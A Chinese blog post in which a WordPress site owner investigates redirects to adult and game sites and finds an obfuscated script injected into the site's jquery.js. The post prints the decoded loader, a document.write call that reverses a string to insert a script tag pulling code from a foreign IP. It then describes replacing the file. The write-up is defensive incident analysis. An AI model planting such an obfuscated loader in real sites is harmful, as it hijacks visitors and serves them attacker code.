美文网首页
Wordpress被植入恶意代码

Wordpress被植入恶意代码

作者: 纸言片语 | 来源:发表于2017-12-24 21:14 被阅读0次

很早之前通过手机访问我的网站的时候,就发现会自动跳转到某些小片片的网站,今天PC访问,本没有什么问题,可是后来发现有一个不安全的脚本被chrome拦截

出现不安全脚本

于是我就好奇,这到底是设个什么呢,运行这个脚本以后自动弹出了网页

t弹出了十分带有挑衅性质的网页

这个网页简直了,右侧自动打码,防止河蟹

随后便进入了一个国外的页游

我在想这到底事如何实现的呢

当运行这个脚本的时候,chrome地址栏的https变为红色

终于体会到加SSL/HTTPS的好处,简单明了

首先针对不安全的页面进行分析

通过审查元素可以看出有一个未知的chrome扩展插件,后来查明是之前安装用来发emoji表情的,为了安全起见,先将其删除。

删除后仍然存在不安全脚本,排除Chome扩展插件植入问题

继续分析发现有这个奇怪的网址

这又一个奇怪的网址,查询IP后得知

是一个国外IP

翻遍了网站首页源码,却找不到这个网址

继续分析源码,发现一个奇怪的JS藏在其中

发现这个JS正是来自于这个IP

一个普通的JS加密,我曾经写过更复杂的,上学期学习CSS&DIV课程时,为了防止web作业被抄袭,写过JS跳转代码,又担心被别人发现,做了多重JS加密(那个我自己都解不开了=。=

解密的时候自动提示已被编码 解密后的js

var _0xc790 = [ "", "join", "reverse", "split", '>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<', "write" ];

document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0]));

发现奇怪JS后,果断删除其中内容

本来想下载到本地后在删除其中代码

万万没想到

FTP下载后直接报毒

果断删除该文件,后来想想,可能有的其他地方需要jQuery

去官方下载安全正常的js文件

覆盖掉旧的JQUERY.JS后

就没有弹窗,和不安全的脚本了

相关文章

  • Wordpress被植入恶意代码

    很早之前通过手机访问我的网站的时候,就发现会自动跳转到某些小片片的网站,今天PC访问,本没有什么问题,可是后来发现...

  • 监测“event-stream”库是否感染及修复方法

    缘起 这两天,一个被广泛应用的javascript第三方库“event-steram”爆出被人植入恶意代码,能够窃...

  • 安全

    XSS XSS攻击:跨站脚本攻击(Cross-Site Scripting)。基本原理是:将恶意代码植入页面。分为...

  • Android 应用防止被二次打包方法

    前言 “Android APP二次打包”则是盗版正规Android APP,破解后植入恶意代码重新打包。不管从性能...

  • 记一次搜索引擎劫持攻击

    最近公司网站连续被黑了两次,都是被植入了一些恶意代码,让点击进入网站的时候,跳往色情、赌博等网站。这里就简单记录下...

  • 09.DVWA之反射型XSS

    漏洞概述 反射型XSS是指应用程序直接将攻击者提交的具有恶意代码的数据回传浏览器,因html注入导致页面被植入恶意...

  • WordPress 主题感染恶意代码function _chec

    孙森SEO团队开发网站这么久,第一次感染恶意代码,整个 WordPress 下的主题 functions.php ...

  • Android APK 反编译教程

    反编译的目的是有助于我们学习规范代码,而不是植入恶意代码,窃取他人智慧成果。 Don't be evil. 本文介...

  • 浅谈web安全

    xss 跨站脚本攻击通过输入框等路径,将恶意代码注入到页面。 xss能造成什么破坏? 广告植入;窃取用户cooki...

  • 2018-05-19-File Upload

    1.File Upload: 文件上传的漏洞主要原理在于利用这些文件上传的地方将恶意代码植入到服务器中,然后利用u...

网友评论

      本文标题:Wordpress被植入恶意代码

      本文链接:https://www.haomeiwen.com/subject/awnhgxtx.html